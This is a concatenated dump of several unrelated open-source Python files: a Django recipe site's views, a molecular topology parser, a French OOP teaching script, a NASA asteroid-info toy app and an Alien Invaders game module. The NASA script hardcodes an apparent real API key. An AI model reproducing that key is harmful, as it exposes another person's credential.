context_object_name = 'recipe'\n#\n# def get_context_data(self, *, object_list=None, **kwargs):\n# context = super().get_context_data(**kwargs)\n# context['title'] = 'Книга рецептов'\n# return context\n#\n# def get_queryset(self):\n# return Recipe.objects.filter(published=True)\n\n\ndef index(request, tag_id=None, category_slug=None):\n recipe = Recipe.objects.filter(published=True)\n tag = None\n category = None\n\n if tag_id:\n tag = get_object_or_404(Tag, pk=tag_id)\n recipe = recipe.filter(tags__in=[tag])\n\n if category_slug:\n category = get_object_or_404(Category, slug=category_slug)\n recipe = recipe.filter(category__in=[category])\n\n paginator = Paginator(recipe, 9)\n page = request.GET.get('page')\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n # Если номер страницы не INT, то включить 1ю страницу.\n posts = paginator.page(1)\n except EmptyPage:\n # Если номер страницы больше максимального, отобразить последнюю страницу.\n posts = paginator.page(paginator.num_pages)\n\n context = {\n # 'recipe': recipe,\n 'title': 'Книга рецептов',\n 'categories': Category.objects.all(),\n 'page': page,\n 'posts': posts,\n 'tag': tag,\n 'category': category,\n }\n return render(request, 'recipe/recipe/index.html', context=context)\n\n\n# class Cat(ListView):\n# model = Recipe\n# template_name = 'recipe/category.html'\n# context_object_name = 'recipe'\n#\n# def get_queryset(self):\n# return Recipe.objects.filter(category=self.kwargs['category_slug'], published=True)\n\n\ndef recipe_view(request, recipe_slug):\n recipe_full = Recipe.objects.get(slug=recipe_slug)\n\n post_tags_ids = recipe_full.tags.values_list('id', flat=True)\n similar_posts = Recipe.objects.filter(tags__in=post_tags_ids).exclude(id=recipe_full.id)\n similar_posts = similar_posts.annotate(same_tags=Count('tags')).order_by('-same_tags', '-create_at')[:3]\n\n context = {\n 'recipe_full': recipe_full,\n 'similar_posts': similar_posts,\n }\n return render(request, 'recipe/recipe/recipe.html', context=context)\n\n\ndef add_recipe(request):\n if request.method == 'POST':\n form = RecipeForm(request.POST)\n if form.is_valid():\n # recipe = Recipe.objects.create(**form.cleaned_data)\n recipe = form.save()\n return redirect(recipe)\n else:\n form = RecipeForm()\n return render(request, 'recipe/recipe/add_recipe.html', {'form': form})\n\n\ndef about(request):\n return render(request, 'recipe/recipe/about.html')\n\n\ndef register(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n messages.success(request, 'Успех!')\n return redirect('home')\n else:\n messages.error(request, 'Неудача!')\n else:\n form = UserCreationForm()\n return render(request, 'recipe/recipe/register.html', {'form': form})\n\n\ndef user_login(request):\n if request.method == 'POST':\n form = UserLoginForm(data=request.POST)\n if form.is_valid():\n user = form.get_user()\n login(request, user)\n return redirect('home')\n else:\n form = UserLoginForm()\n return render(request, 'recipe/recipe/login.html', {\"form\": form})\n\n\ndef user_logout(request):\n logout(request)\n return redirect('login')\n\n\nclass Search(ListView):\n template_name = 'recipe/recipe/index.html'\n context_object_name = 'posts'\n paginate_by = 9\n\n def get_queryset(self):\n return Recipe.objects.filter(title__icontains=self.request.GET.get('s'))\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['s'] = 
f\"s={self.request.GET.get('s')}&\"\n context['title'] = f\"Поиск по запросу: {self.request.GET.get('s')}\"\n return context","repo_name":"kovdmit/recipe-book","sub_path":"recipe/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16167885363","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom os import path\n\n\n#===============================================================================\nclass Section(object):\n\tdef __init__(self, name, content):\n\t\tself.name = name\n\t\tself.content = content\n\t\t\n\tdef __repr__(self):\n\t\treturn(\"<Section %s>\"%self.name)\n\n\tdef pure_content(self): \n\t\t\"\"\" removes empty lines and those starting with # or ; \"\"\"\n\t\treturn(re.sub(\"(?m)^([;#].*|\\s*)\\n\", \"\", self.content))\n\t\t\n#===============================================================================\nclass Moleculetype(object):\n\tdef __init__(self, top, section):\n\t\tself.top = top\n\t\tself.section = section\n\t\tself.num_atoms = 0\n\n\tdef name(self):\n\t\treturn(self.section.pure_content().split()[0])\n\n\tdef __repr__(self):\n\t\treturn(\"<Moleculetype %s>\"%self.name())\n\n\tdef add2section(self, sectionname, newcontent):\n\t\ti = self.top.sections.index(self.section)\n\t\tfor s in self.top.sections[i+1:]:\n\t\t\tif(s.name == sectionname):\n\t\t\t\ts.content += newcontent\n\t\t\t\treturn\n\t\t\tif(s.name == \"moleculetype\"):\n\t\t\t\tbreak\n\t\t\t\t\n\t\t#section not found - create a new one\n\t\tnew_section = Section(sectionname, newcontent)\n\t\tself.top.sections.insert(i+2, new_section) #add after atoms-section\n\t\t#raise(Exception(\"Section with name: %s not found.\"%sectionname))\n\t\t\n#===============================================================================\nclass Topology(object):\n\tdef __init__(self, filename):\n\t\tself.moleculetypes = {}\n\t\tself.molecules = []\t\t\n\t\tself.sections = []\n\t\t\n\t \t#TODO: run through cpp to resolve #include, #IFDEF etc\n\t \t#alternative: grompp -pp \n\t\trawdata = open(filename).read()\n\t\tdef loadfile(m):\n\t\t\tfn = path.join(path.basename(filename), m.group(1))\n\t\t\tif(path.exists(fn)):\n\t\t\t\treturn(open(fn).read())\n\t\t\treturn('#include \"%s\"\\n'%m.group(1))\n\n\t\trawdata = re.sub('#include\\s+\"([^\"]*)\"\\s+', loadfile , rawdata) #resolve includes\n\n\t\tparts = re.split(\"\\[\\s*(\\w*)\\s*\\]\", rawdata)\n\t\tself.header = parts.pop(0)\n\t\tassert(len(parts)%2 == 0) #expecting section-name / section-content pairs\n\t\t\n\t\twhile(len(parts) > 0):\n\t\t\ts = Section(name=parts.pop(0), content=parts.pop(0))\n\t\t\tself.sections.append(s) \n\t\t\n\t\tcurrent_mt = None\n\t\tfor s in self.sections:\n\t\t\tif(s.name == \"moleculetype\"):\n\t\t\t\tname = s.pure_content().split()[0]\n\t\t\t\tcurrent_mt = Moleculetype(self, s)\n\t\t\t\tself.moleculetypes[name] = current_mt\n\t\t\telif(s.name == \"atoms\"):\n\t\t\t\tcurrent_mt.num_atoms += s.pure_content().count(\"\\n\")\n\t\t\telif(s.name == \"molecules\"):\n\t\t\t\tself.molecules += [x.split() for x in s.pure_content().split(\"\\n\") if len(x.strip())>0]\n\n\n\tdef write(self, filename):\n\t\tf = open(filename, \"w\")\n\t\tf.write(self.header)\n\t\tfor s in self.sections:\n\t\t\tf.write(\"[ %s ]\\n\"%s.name)\n\t\t\tf.write(s.content+\"\\n\")\n\t\tf.close()\n\t\n\tdef atomnum2molnum(self, abs_atom_num):\n\t\t\"\"\" Converts abs. atom number to abs. 
molecule number \"\"\"\n\t\tabs_mol_counter = 1\n\t\tabs_atom_counter = 1\n\t\tfor (name, num) in self.molecules:\n\t\t\tfor dummy in range(int(num)):\n\t\t\t\tabs_atom_counter += self.moleculetypes[name].num_atoms\n\t\t\t\tabs_mol_counter += 1\n\t\t\t\tif(abs_atom_num < abs_atom_counter):\n\t\t\t\t\treturn(abs_mol_counter -1)\n\t\traise(Exception(\"Absolute Atom Number too hight: %d\"%abs_atom_num))\n\n\n\tdef molnum2moltype(self, abs_mol_num):\n\t\tabs_mol_counter = 0\n\t\tfor (name, num) in self.molecules:\n\t\t\tabs_mol_counter += int(num)\n\t\t\tif(abs_mol_num <= abs_mol_counter):\n\t\t\t\treturn(self.moleculetypes[name])\n\t\traise(Exception(\"Absolute Molecule Number too hight: %d\"%abs_mol_num))\n\n\tdef abs2rel_atomnum(self, abs_atom_num):\n\t\t#TODO: more testing\n\t\tfor (name, num) in self.molecules:\n\t\t\tmol_size = self.moleculetypes[name].num_atoms\n\t\t\tif(abs_atom_num > mol_size * num):\n\t\t\t\tabs_atom_num -= mol_size * num\n\t\t\telif(abs_atom_num == mol_size):\n\t\t\t\treturn(mol_size)\n\t\t\telse:\n\t\t\t\treturn(abs_atom_num % mol_size)\n\n\t\traise(Exception(\"Absolute Atom Number too hight: %d\"%abs_atom_num))\n\n#\tdef atomnum2moltype(self, abs_atom_num):\n#\t\tmolnum = self.atomnum2molnum(abs_atom_num)\n#\t\treturn(self.molnum2moltype(molnum))\n\n#===============================================================================\n#EOF\n","repo_name":"CMD-at-ZIB/ZIBMolPy","sub_path":"ZIBMolPy_package/ZIBMolPy/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"1765647037","text":"# Attributs d'instance / attributs statiques (ou attributs de classe synonyme)\n\n# Attributs d'instances : chaque instance a sa propre valeur\n# Attributs statiques : partagé par toutes les instances\n\n# on souhaite conserver le nombre de personnages instanciés dans \n# l'appli\n\nclass Personnage:\n total_personnage = 0 # valeur initialisée lors du chargement\n # de la classe en mémoire\n def __init__(self, nom = \"John\", arme = \"Epée\", pdv = 100):\n self.nom = nom \n self.arme = arme\n self.pdv = pdv\n Personnage.total_personnage += 1\n\n # les méthodes ou attributs commencant et terminant par des _ _ \n # sont appelées soit spéciales soit magiques\n # il existe une méthode spéciale, __del__ qui est appelée par le ramasse miettes\n # juste avant de libérer l'espace mémoire associé à un objet\n # 1 argument obligatoire, qui correspond à l'instance qui va être supprimée\n # self\n def __del__(self):\n Personnage.total_personnage -= 1\n\n # méthode d'instance : méthode qui effectue un traitement avec une instance\n # méthode propre à chaque instance\n # premier argument obligatoire : self. Il correspond à l'instance qui fait\n # appel à la méthode\n def combattre(self, degat = 10):\n self.pdv -= degat\n print(f\"Combat terminé. 
Il reste {self.pdv} pdv au personnage {self.nom}\")\n\n # méthode de classe : méthode partagée par toutes les instances\n # dont le comportement ne dépend pas d'une instance en particulier\n # on utilise un décorateur : \n # une spécification à la ligne précédent la signature de la méthode\n # un premier argument obligatoire : cls pour référence à la classe\n @classmethod\n def afficher_total(cls): # cls sera Personnage\n print(f\"Il y a un total de {cls.total_personnage} personnages\")\n\n # méthode statique : comme une méthode de classe, sauf que l'argument cls\n # est inutile et donc pas d'argument obligatoire\n @staticmethod\n def dire_bonjour():\n print(\"Bonjour\")\n\n # FIN DU BLOC CLASS\n\nprint(f\"Il y a un total de {Personnage.total_personnage} personnages\")\np1 = Personnage()\nprint(f\"Il y a un total de {Personnage.total_personnage} personnages\")\np2 = Personnage(\"Maude\",\"Hache\",150)\nprint(f\"Il y a un total de {Personnage.total_personnage} personnages\")\np1 = Personnage(\"Cyril\",\"Dague\",50)\nprint(f\"Il y a un total de {Personnage.total_personnage} personnages\")\n\n# John n'est plus référencé par aucune variable : on ne peut plus y avoir accès\n# il ne sert plus à rien dans le programme\n# un ramasse miettes vient régulièrement libérer l'espace mémoire associé\n# aux objets qui ne sont plus référencés\n\np1.combattre()\np1.combattre(25)\n\nPersonnage.afficher_total()\nPersonnage.dire_bonjour()\n","repo_name":"SylvainJanet/FormationPythonInitiationApprofondissement20221114","sub_path":"17_classes/classes_2.py","file_name":"classes_2.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34657070432","text":"# Let's build a python application to pull some info on Near Earth Objects and give it back to people in interesting ways\n\nimport requests\nimport json\nimport datetime\nimport random\n\n\n# TODO: Build a method to pull the feed data based on user input start/end dates\n\n# API Endpoint\n\napi_url = \"https://api.nasa.gov/neo/rest/v1/feed/today?detailed=true&api_key=\"\napiKey = \"13L6o25sYaUm7Ac1Op2e09FrWudmH6N0rRhVBoCx\"\n\n# Get and return data\nresponse = requests.get(api_url + apiKey)\ndata = response.text\nparsed = json.loads(data)\n\n# Set variables based on data\n# Sets a variable to dynamically pull today's date and then turns it into a string\ntodays_date = str(datetime.date.today())\n\n# Sets \"neos\" as a variable which is the entirety of the API data along with some other global variables\nneos = parsed[\"near_earth_objects\"][todays_date]\ntotal_neos_today = parsed[\"element_count\"]\nlength_of_armadillo = 1.5\nlength_of_delorean = 4.2\ni = random.randint(1,5)\n\n# max_diameter = neos[\"estimated_diameter\"][\"meters\"][\"estimated_diameter_max\"]\n\n# TODO: Parse the data to return data for...\n\n# TODO: ...Furthest NEO\n\n\n# Function to calculate the total number of potentially hazardous asteriods\n\ndef get_total_phas(neos):\n total_phas = 0\n for pha in neos:\n if pha[\"is_potentially_hazardous_asteroid\"] is True:\n total_phas = total_phas + 1\n pass\n return(total_phas)\n\n# Write a function to return the largest NEO in diameter\ndef get_largest_neo(neos):\n largest = None\n for diameter in neos:\n max_diameter = round(diameter[\"estimated_diameter\"][\"meters\"][\"estimated_diameter_max\"])\n if largest is None:\n largest = max_diameter \n if largest > max_diameter:\n pass\n else:\n largest = max_diameter\n name = diameter[\"name\"]\n 
return(largest, name)\n\n# TODO Function to get the smallest NEO\n\ndef get_smallest_neo(neos):\n smallest = None\n for diameter in neos:\n min_diameter = round(diameter[\"estimated_diameter\"][\"meters\"][\"estimated_diameter_min\"])\n if smallest is None:\n smallest = min_diameter\n if smallest < min_diameter:\n pass\n else:\n smallest = min_diameter\n name = diameter[\"name\"]\n return(smallest, name)\n\n# Function to get the fastest NEO\n\ndef get_fastest_neo(neos):\n velocity = None\n for speed in neos:\n km_per_second = speed[\"close_approach_data\"][0][\"relative_velocity\"][\"kilometers_per_second\"]\n km_per_second = float(km_per_second)\n if velocity is None:\n velocity = km_per_second\n if velocity > km_per_second:\n pass\n else:\n velocity = km_per_second\n name = speed[\"name\"]\n return(round(velocity), name)\n\n# Function to generate a random mild insult to insert in the greeting\n\ndef generate_random_insult(i):\n if i == 1:\n insult = \"worry wart\"\n elif i == 2:\n insult = \"high level hypochondriac\"\n elif i == 3:\n insult = \"inquisitive interstellar instigator\"\n elif i == 4:\n insult = \"celestial conjurer of ceaseless candor\"\n elif i == 5:\n insult = \"laser-brained luddite\"\n return(insult)\n\n\n\n\n# TODO Write a function to return these calculations\n# Declare variables for other units of measure and do the math\n\nlargest_diameter_in_armadillos = round(get_largest_neo(neos)[0] / length_of_armadillo)\nlargest_diameter_in_deloreans = round(get_largest_neo(neos)[0] / length_of_delorean)\nsmallest_diameter_in_armadillos = round(get_smallest_neo(neos)[0] / length_of_armadillo)\nsmallest_diameter_in_deloreans = round(get_smallest_neo(neos)[0] / length_of_delorean)\n\n\n# All the \"print\" statements\n\n# Define the \"main\" function\n\ndef asteroidvariables(x): \n \n if x.lower() == \"fastest\":\n asteroid = \"{} is the fastest NEO today, racing towards somewhere at a speed of {} kilometers per second.\".format(get_fastest_neo(neos)[1], get_fastest_neo(neos)[0])\n elif x.lower() == \"largest\":\n asteroid = \"{} is the largest NEO today at a whopping {} meters in diameter! \\nThat means it's {} armadillos OR {} Deloreans in diameter!\".format(get_largest_neo(neos)[1], get_largest_neo(neos)[0], largest_diameter_in_armadillos, largest_diameter_in_deloreans)\n elif x.lower() == \"smallest\":\n asteroid = \"{} is the smallest NEO today. It checks in at a paltry {} meters in diameter. \\nThat means it's only {} armadillos OR {} Deloreans in diameter!\".format(get_smallest_neo(neos)[1], get_smallest_neo(neos)[0], smallest_diameter_in_armadillos, smallest_diameter_in_deloreans)\n else:\n print(\"\\nOkay, you silly trickster. You and I both know that {} is not any of the things I said you could ask for. \\nHow's about we try that again?\".format(x))\n x = input(\"Try fastest, largest, or smallest.\\n\\t> \")\n return asteroidvariables(x)\n\n return asteroid\n\ndef all_done():\n finished = input(\"\\nWell now aren't we all more informed? \\nDid you want to know anything else today? (Yes/No): \")\n if finished.lower() == \"yes\":\n main()\n elif finished.lower() == \"no\":\n print(\"Okay then. I hope you enjoyed learning about whether or not we're all gonna die today. Come back anytime!\")\n else:\n print(\"Ummm...it was a yes or no question, friend. \\nLast time I checked, {} is not yes OR no. Let's try it again, shall we?\".format(finished))\n all_done()\n\ndef main():\n print(\"Well hello you {}! Since you asked, there are {} Near Earth Objects on close approach today. 
\\nNever fear, though, only {} of them are potentially hazardous. Wait, {} of them are potentially hazardous?!!? \\nEverybody run for your lives!!!! \".format(generate_random_insult(i), total_neos_today, get_total_phas(neos), get_total_phas(neos)))\n print(\"\\nWell, since we're here anyway...\")\n x = input(\"So, do you want to know the fastest, largest, or smallest world ending near Earth object?\\n\\t> \")\n asteroidresult = asteroidvariables(x)\n print(asteroidresult)\n return all_done()\n\nmain()\n\n\n\n# print(\"You might ask, 'Are we in danger?' and the answer would be...not at all! Although today is the date of close approach to Earth, it's going to pass at a comfortable {} Kilometers from our planet. You can now exhale.\".format(close_approach_distance))\n\n# print (max_diameter)\n\n# pass\n \n# largest = neo(max_diameter)\n# return largest\n\n# print find_largest()\n\n\n# TODO: ...Fastest NEO\n\n# TODO: Any NEO classified as PHA (potentially hazardous)","repo_name":"andrheau/nasaNEO","sub_path":"Testpage.py","file_name":"Testpage.py","file_ext":"py","file_size_in_byte":6549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23399334415","text":"# by TR\n\nimport os\nimport fftw3\nfrom sito.data import FFTW3_WISDOM_FILE\n\n_plan = None\n_plan2 = None\n\nUSE_OLD_PLAN = False\n\n\nclass __WisdomHandler(object):\n wisdomfile = FFTW3_WISDOM_FILE\n\n def __init__(self):\n if os.path.isfile(self.wisdomfile):\n fftw3.import_wisdom_from_file(self.wisdomfile)\n\n def remove(self):\n if os.path.isfile(self.wisdomfile):\n os.remove(self.wisdomfile)\n\n def forget(self):\n fftw3.forget_wisdom()\n\n def setUseOldPlan(self, val):\n \"\"\" val 1 == True, 2 = False \"\"\"\n global USE_OLD_PLAN\n USE_OLD_PLAN = val\n\n def __del__(self):\n try:\n fftw3.export_wisdom_to_file(self.wisdomfile)\n except TypeError:\n pass\n\nwisdom = __WisdomHandler()\n\n\ndef fft(data, nfft=None, in_place=False, use_old_plan=True, **kwargs_in):\n global _plan\n if USE_OLD_PLAN:\n use_old_plan = (USE_OLD_PLAN == 1)\n# print('USE OLD PLAN %s' % str(use_old_plan))\n kwargs = dict(flags=['measure'])\n kwargs.update(kwargs_in)\n if nfft == None:\n nfft = len(data)\n if _plan is None or (use_old_plan and nfft != len(_plan.inarray)):\n use_old_plan = False\n if not use_old_plan:\n input_ = fftw3.create_aligned_array(nfft)\n if in_place:\n output = None\n else:\n output = fftw3.create_aligned_array(nfft)\n _plan = fftw3.Plan(input_, output, **kwargs)\n _plan.inarray[:len(data)] = data\n _plan.inarray[len(data):] = 0\n _plan.outarray[:] = 0\n _plan()\n if _plan.outarray is None:\n ret = _plan.inarray\n else:\n ret = _plan.outarray\n return ret\n\n\ndef ifft(data, nfft=None, in_place=False, use_old_plan=True, **kwargs_in):\n global _plan2\n if USE_OLD_PLAN:\n use_old_plan = (USE_OLD_PLAN == 1)\n kwargs = dict(direction='backward', flags=['measure'])\n kwargs.update(kwargs_in)\n if nfft == None:\n nfft = len(data)\n if _plan2 is None or(use_old_plan and nfft != len(_plan2.inarray)):\n use_old_plan = False\n if not use_old_plan:\n input_ = fftw3.create_aligned_array(nfft)\n if in_place:\n output = None\n else:\n output = fftw3.create_aligned_array(nfft)\n _plan2 = fftw3.Plan(input_, output, **kwargs)\n _plan2.inarray[:len(data)] = data\n _plan2.inarray[len(data):] = 0\n _plan2()\n if _plan2.outarray is None:\n ret = _plan2.inarray\n else:\n ret = _plan2.outarray\n return ret / 
nfft\n","repo_name":"trichter/sito","sub_path":"util/fftw3_be.py","file_name":"fftw3_be.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"37225630379","text":"\"\"\"\nModels module for Alien Invaders\n\nThis module contains the model classes for the Alien Invaders game. Anything\nthat you interact with on the screen is model: the ship, the laser bolts, and\nthe aliens.\n\nJust because something is a model does not mean there has to be a special\nclass for it. Unless you need something special for your extra gameplay\nfeatures, Ship and Aliens could just be an instance of GImage that you move\nacross the screen. You only need a new class when you add extra features to\nan object. So technically Bolt, which has a velocity, is really the only model\nthat needs to have its own class.\n\nWith that said, we have included the subclasses for Ship and Aliens. That is\nbecause there are a lot of constants in consts.py for initializing the\nobjects, and you might want to add a custom initializer. With that said,\nfeel free to keep the pass underneath the class definitions if you do not want\nto do that.\n\nYou are free to add even more models to this module. You may wish to do this\nwhen you add new features to your game, such as power-ups. If you are unsure\nabout whether to make a new class or not, please ask on Piazza.\n\n# Aashri Aggarwal (aia56) and Abby Sachar (ahs265)\n# December 10th, 2019\n\"\"\"\nfrom consts import *\nfrom game2d import *\nimport random\nimport math\n\n# PRIMARY RULE: Models are not allowed to access anything in any module other\n# than consts.py. If you need extra information from Gameplay, then it should\n# be a parameter in your method, and Wave should pass it as a argument when it\n# calls the method.\n\n\nclass Ship(GImage):\n \"\"\"\n A class to represent the game ship.\n\n At the very least, you want a __init__ method to initialize the ships\n dimensions. These dimensions are all specified in consts.py.\n\n You should probably add a method for moving the ship. While moving a\n ship just means changing the x attribute (which you can do directly),\n you want to prevent the player from moving the ship offscreen. This\n is an ideal thing to do in a method.\n\n You also MIGHT want to add code to detect a collision with a bolt. We\n do not require this. You could put this method in Wave if you wanted to.\n But the advantage of putting it here is that Ships and Aliens collide\n with different bolts. Ships collide with Alien bolts, not Ship bolts.\n And Aliens collide with Ship bolts, not Alien bolts. An easy way to\n keep this straight is for this class to have its own collision method.\n\n However, there is no need for any more attributes other than those\n inherited by GImage. 
You would only add attributes if you needed them\n for extra gameplay features (like animation).\n \"\"\"\n # IF YOU ADD ATTRIBUTES, LIST THEM BELOW\n pass\n\n # GETTERS AND SETTERS (ONLY ADD IF YOU NEED THEM)\n def getShip_x(self):\n \"\"\"\n Returns the horizontal coordinate of the ship object\n \"\"\"\n return self.x\n\n def __init__(self, x, y, width = SHIP_WIDTH, height = SHIP_HEIGHT):\n \"\"\"\n Initializes the ship dimensions.\n\n Parameter x: The horizontal coordinate of the object center\n Precondition: Value must be an int or float\n\n Parameter y: The vertical coordinate of the object center\n Precondition: Value must be an int or float\n\n Parameter source: The image file of the object created\n Precondition: Must be a png file\n\n Parameter width: The horizontal length of the object\n Precondition: Value must be an int or float and must be >= 0\n\n Parameter height: The vertical length of the object\n Precondition: Value must be an int or float and must be >= 0\n \"\"\"\n assert type(x) in [int, float]\n assert type(y) in [int, float]\n assert type(width) == int or type(width) == float\n assert width >= 0\n assert type(height) == int or type(height) == float\n assert height >= 0\n\n super().__init__(x=x, y=y,width = width, height = height, source = 'Ship.png')\n\n # METHODS TO MOVE THE SHIP AND CHECK FOR COLLISIONS\n def collideswShip(self, bolt):\n \"\"\"\n Returns True if the alien bolt collides with the ship.\n\n This method returns False if bolt was not fired by an alien.\n\n Parameter bolt: The laser bolt to check\n Precondition: bolt is of class Bolt\n \"\"\"\n #Check if bolt was fired by player\n if bolt.getVelocity() > 0:\n return False\n if self.contains(bolt.leftTopCorner()) == True:\n return True\n elif self.contains(bolt.rightTopCorner()) == True:\n return True\n elif self.contains(bolt.leftBottomCorner()) == True:\n return True\n elif self.contains(bolt.rightBottomCorner()) == True:\n return True\n else:\n return False\n\n def collideswShip2(self, pup):\n \"\"\"\n Returns True if the alien bolt collides with the ship.\n\n This method returns False if bolt was not fired by an alien.\n\n Parameter pup: The powerup to check\n Precondition: pup is of class PowerUp\n \"\"\"\n #Check if bolt was fired by player\n if self.contains(pup.leftTopCorner()) == True:\n return True\n elif self.contains(pup.rightTopCorner()) == True:\n return True\n elif self.contains(pup.leftBottomCorner()) == True:\n return True\n elif self.contains(pup.rightBottomCorner()) == True:\n return True\n else:\n return False\n # ADD MORE METHODS (PROPERLY SPECIFIED) AS NECESSARY\n\n\nclass Alien(GImage):\n \"\"\"\n A class to represent a single alien.\n\n At the very least, you want a __init__ method to initialize the alien\n dimensions. These dimensions are all specified in consts.py.\n\n You also MIGHT want to add code to detect a collision with a bolt. We\n do not require this. You could put this method in Wave if you wanted to.\n But the advantage of putting it here is that Ships and Aliens collide\n with different bolts. Ships collide with Alien bolts, not Ship bolts.\n And Aliens collide with Ship bolts, not Alien bolts. An easy way to\n keep this straight is for this class to have its own collision method.\n\n However, there is no need for any more attributes other than those\n inherited by GImage. 
You would only add attributes if you needed them\n for extra gameplay features (like giving each alien a score value).\n \"\"\"\n # IF YOU ADD ATTRIBUTES, LIST THEM BELOW\n #Attribute: _points: number of points an alien is worth\n #Invariant: _points is an int >= 0\n pass\n\n # GETTERS AND SETTERS (ONLY ADD IF YOU NEED THEM)\n def getAlien_x(self):\n \"\"\"\n Returns the x coordinate of the alien object.\n \"\"\"\n return self.x\n\n def getAlien_y(self):\n \"\"\"\n Returns the y coordinate of the alien object.\n \"\"\"\n return self.y\n\n def getAlienpoints(self):\n \"\"\"\n Returns the number of points the alien is worth.\n \"\"\"\n return self._points\n\n def setAlien_x(self, value):\n \"\"\"\n Sets x coordinate of the alien object to value.\n\n Parameter value: the new x coordinate for the alien object\n Precondition: must be an int or float\n \"\"\"\n assert type(value) in [int, float]\n self.x = value\n\n def setAlien_y(self, value):\n \"\"\"\n Sets y coordinate of the alien object to value.\n\n Parameter value: the new y coordinate for the alien object\n Precondition: must be an int or float\n \"\"\"\n assert type(value) in [int, float]\n self.y = value\n\n # INITIALIZER TO CREATE AN ALIEN\n def __init__(self, x, y, source, width = ALIEN_WIDTH, height = ALIEN_HEIGHT):\n \"\"\"\n Initializes the alien dimensions.\n\n Parameter x: The horizontal coordinate of the object center\n Precondition: Value must be an int or float\n\n Parameter y: The vertical coordinate of the object center\n Precondition: Value must be an int or float\n\n Parameter source: The image file of the object created\n Precondition: Must be a png file\n\n Parameter width: The horizontal length of the object\n Precondition: Value must be an int or float and must be >= 0\n\n Parameter height: The vertical length of the object\n Precondition: Value must be an int or float and must be >= 0\n \"\"\"\n assert type(x) in [int, float]\n assert type(y) in [int, float]\n assert source in ALIEN_IMAGES\n assert type(width) == int or type(width) == float\n assert width >= 0\n assert type(height) == int or type(height) == float\n assert height >= 0\n\n super().__init__(x=x, y=y,width = width, height = height, source = source)\n if source == ALIEN_IMAGES[0]:\n self._points = 10\n elif source == ALIEN_IMAGES[1]:\n self._points = 20\n elif source == ALIEN_IMAGES[2]:\n self._points = 30\n\n # METHOD TO CHECK FOR COLLISION (IF DESIRED)\n def collideswAlien(self, bolt):\n \"\"\"\n Returns True if the player bolt collides with this Alien.\n\n This method returns False if bolt was not fired by the player.\n\n Parameter bolt: The laser bolt to check\n Precondition: bolt is of class Bolt\n \"\"\"\n #Check if bolt was fired by player\n if bolt.getVelocity() < 0:\n return False\n if self.contains(bolt.leftTopCorner()) == True:\n return True\n elif self.contains(bolt.rightTopCorner()) == True:\n return True\n elif self.contains(bolt.leftBottomCorner()) == True:\n return True\n elif self.contains(bolt.rightBottomCorner()) == True:\n return True\n else:\n return False\n\n # ADD MORE METHODS (PROPERLY SPECIFIED) AS NECESSARY\n\nclass Bolt(GRectangle):\n \"\"\"\n A class representing a laser bolt.\n\n Laser bolts are often just thin, white rectangles. The size of the bolt\n is determined by constants in consts.py. We MUST subclass GRectangle,\n because we need to add an extra (hidden) attribute for the velocity of\n the bolt.\n\n The class Wave will need to look at these attributes, so you will need\n getters for them. 
However, it is possible to write this assignment with\n no setters for the velocities. That is because the velocity is fixed and\n cannot change once the bolt is fired.\n\n In addition to the getters, you need to write the __init__ method to set\n the starting velocity. This __init__ method will need to call the __init__\n from GRectangle as a helper.\n\n You also MIGHT want to create a method to move the bolt. You move the\n bolt by adding the velocity to the y-position. However, the getter\n allows Wave to do this on its own, so this method is not required.\n \"\"\"\n # INSTANCE ATTRIBUTES:\n # Attribute _velocity: the velocity in y direction\n # Invariant: _velocity is an int or float\n #\n\n # LIST MORE ATTRIBUTES (AND THEIR INVARIANTS) HERE IF NECESSARY\n\n # GETTERS AND SETTERS (ONLY ADD IF YOU NEED THEM)\n def getVelocity(self):\n \"\"\"\n Return _velocity of the bolt object.\n \"\"\"\n return self._velocity\n\n # INITIALIZER TO SET THE VELOCITY\n def __init__(self, velocity, x, y):\n \"\"\"\n Initializes the bolt dimensions\n \"\"\"\n super().__init__(x = x, y = y, width = BOLT_WIDTH, height = BOLT_HEIGHT,\n fillcolor = 'red', linecolor = 'red')\n self._velocity = velocity\n\n # ADD MORE METHODS (PROPERLY SPECIFIED) AS NECESSARY\n def isPlayerBolt(self):\n \"\"\"\n Changes the velocity for a bolt fired by the player\n \"\"\"\n self._velocity = BOLT_SPEED\n\n def isAlienBolt(self):\n \"\"\"\n Changes the velocity for a bolt fired by the alien\n \"\"\"\n self._velocity = -BOLT_SPEED\n\n def leftTopCorner(self):\n \"\"\"\n Returns the top left corner of the bolt object as a tuple.\n \"\"\"\n x = self.x - 1/2*self.width\n y = self.y + 1/2*self.height\n return (x,y)\n\n def rightTopCorner(self):\n \"\"\"\n Returns the top right corner of the bolt object as a tuple.\n \"\"\"\n x = self.x + 1/2*self.width\n y = self.y + 1/2*self.height\n return (x,y)\n\n def leftBottomCorner(self):\n \"\"\"\n Returns the bottom left corner of the bolt object as a tuple.\n \"\"\"\n x = self.x - 1/2*self.width\n y = self.y - 1/2*self.height\n return (x,y)\n\n def rightBottomCorner(self):\n \"\"\"\n Returns the bottom right corner of the bolt object as a tuple.\n \"\"\"\n x = self.x + 1/2*self.width\n y = self.y - 1/2*self.height\n return (x,y)\n\n # IF YOU NEED ADDITIONAL MODEL CLASSES, THEY GO HERE\nclass Heart(GImage):\n \"\"\"\n A class representing a heart (life).\n \"\"\"\n def __init__(self, x, y):\n \"\"\"\n Initializes the heart object.\n\n Parameter x: The horizontal coordinate of the object center\n Precondition: Value must be an int or float\n\n Parameter y: The vertical coordinate of the object center\n Precondition: Value must be an int or float\n \"\"\"\n width = HEART_WIDTH\n height = HEART_HEIGHT\n source = 'heart.png'\n super().__init__(x=x, y=y,width = width, height = height, source = 